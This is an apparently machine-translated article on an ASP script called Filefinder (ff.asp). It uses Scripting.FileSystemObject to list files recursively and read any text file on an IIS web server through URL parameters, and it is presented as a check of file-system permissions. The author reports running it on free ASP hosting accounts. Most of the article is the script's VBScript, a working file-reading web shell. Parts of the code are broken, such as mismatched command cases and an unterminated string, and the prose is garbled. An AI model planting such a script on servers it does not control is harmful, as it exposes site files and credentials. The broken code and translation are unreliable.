Fso|iis|web|web Service |web Server | security | object | Data Scripting.FileSystemObject object is one of many COM objects provided by Scrrun.dll for Vbscript/jscript control. Scripting.FileSystemObject provides a very convenient access to text files and file directories, but it also poses a threat to IIS Web server data security.
Filefinder's code is simple, consisting of 3 functions and 30 lines of sequential code.
The most critical is the FindFiles function, which iterates through its recursive invocation and searches for the files by a specific file name extension.
function FindFiles (Strstartfolder, Strext)
Dim n
Dim Othisfolder
Dim ofolders
Dim ofiles
Dim ofolder
Dim ofile
' If the system administrator carefully sets the permissions on the file system, the following code will be wrong
' But some catalogs can still be viewed, so we simply ignore the errors in the past.
On Error Resume Next
n = 0
Response.Write "<b>searching" & Strstartfolder & "</b><br>"
Set othisfolder = G_fs.getfolder (Strstartfolder)
Set ofiles = Othisfolder.files
For each ofile in Ofiles
' If it is the specified file name extension, the output connection guides itself, but with a different command cmd
' Here is Cmd=read, the text file that reads the specified physical path
If Issuffix (Ofile.path, Strext) Then
Response.Write "<a target=_blank href= ' ff.asp?cmd=read&path=" & Server.HTMLEncode (Ofile.path) & "' > <font color= ' DodgerBlue ' > ' & Ofile.path & "</font></a><br>"
If Err = 0 Then
n = n + 1
End If
End If
Next
Set ofolders = Othisfolder.subfolders
For each ofolder in Ofolders
n = n + findfiles (Ofolder.path, Strext)
Next
FindFiles = n
End Function
The following code analyzes the parameters that follow the URL:
' Read the values of each parameter
Strcmd = UCase (Request.QueryString ("cmd"))
strpath = Request.QueryString ("path")
Strext = Request.QueryString ("ext")
Brawdata = UCase (Request.QueryString ("raw"))
' Default search. asp file
If strpath = "" Then
strpath = "."
End If
If Strext = "" Then
Strext = ". asp"
End If
' Execute different code according to different command cmd
Select Case Strcmd
Case "Find"
Response.Write FindFiles (strpath, Strext) & "file (s) found"
Case "read"
If brawdata = "T" then
Response.Write ReadTextFile (strpath)
Else
Response.Write "<pre>" & Server.HTMLEncode (ReadTextFile (strpath)) & "</pre>"
End If
Case Else
Response.Write "
End Select
As you can see from the above analysis, if you have sufficient permissions, we can find any text file on the IIS Web server through Filefinder, and we can easily view the contents of the file. For non-text files, it is possible to determine whether they exist and their path, which is sometimes extremely important for advanced hacker.
But these threats to data security are premised on the fact that users who perform ff.asp have at least the right to read directories and files. Because the default security setting for Windows NT Server after installation is that all users can "read" directories and files, it is possible to read directories and file information in a row by either the IIS default username, IUSR_servername, or any other user. Most Windows NT Server system administrators are primarily concerned about the ability of the system to run and generally do not want to change the default directory and file permissions, after all, it takes a lot of risk, and requires a lot of experience. Therefore, we can use Filefinder to check whether the security settings of the file system of the NT Server as the Web servers are secure.
The author specifically sets the permissions on the file system as an IIS Web server, but is limited to inexperience, causing many strange errors, such as: The Experimental NT Server 4.0 is not connected to an Access database. These functions are normal until file system permission changes are made.
For purely research purposes, the authors also experimented on the free ASP space I had applied for (including my personal homepage provided by CSDN), and the result was that Filefinder could run smoothly. And in the http://www2.domaindlx.com/index.html application of the personal home page does not have this problem, it can be seen that this free ASP home page provider In this regard is more serious. Although DOMAINDLX Web servers run on Windows Server, their default file system security permissions are not significantly different from NT 4.0.
Because of the limited ability of the author, we discuss this problem here. Only in this article to the domestic ASP home page provider to provide reference, I hope to be able to provide both the provider and customer data security can be helpful.
Attach: Web services that run with other similar server-side scripts, if they also provide functionality similar to Scripting.FileSystemObject for file system operations, no matter what platform should have the same problem.
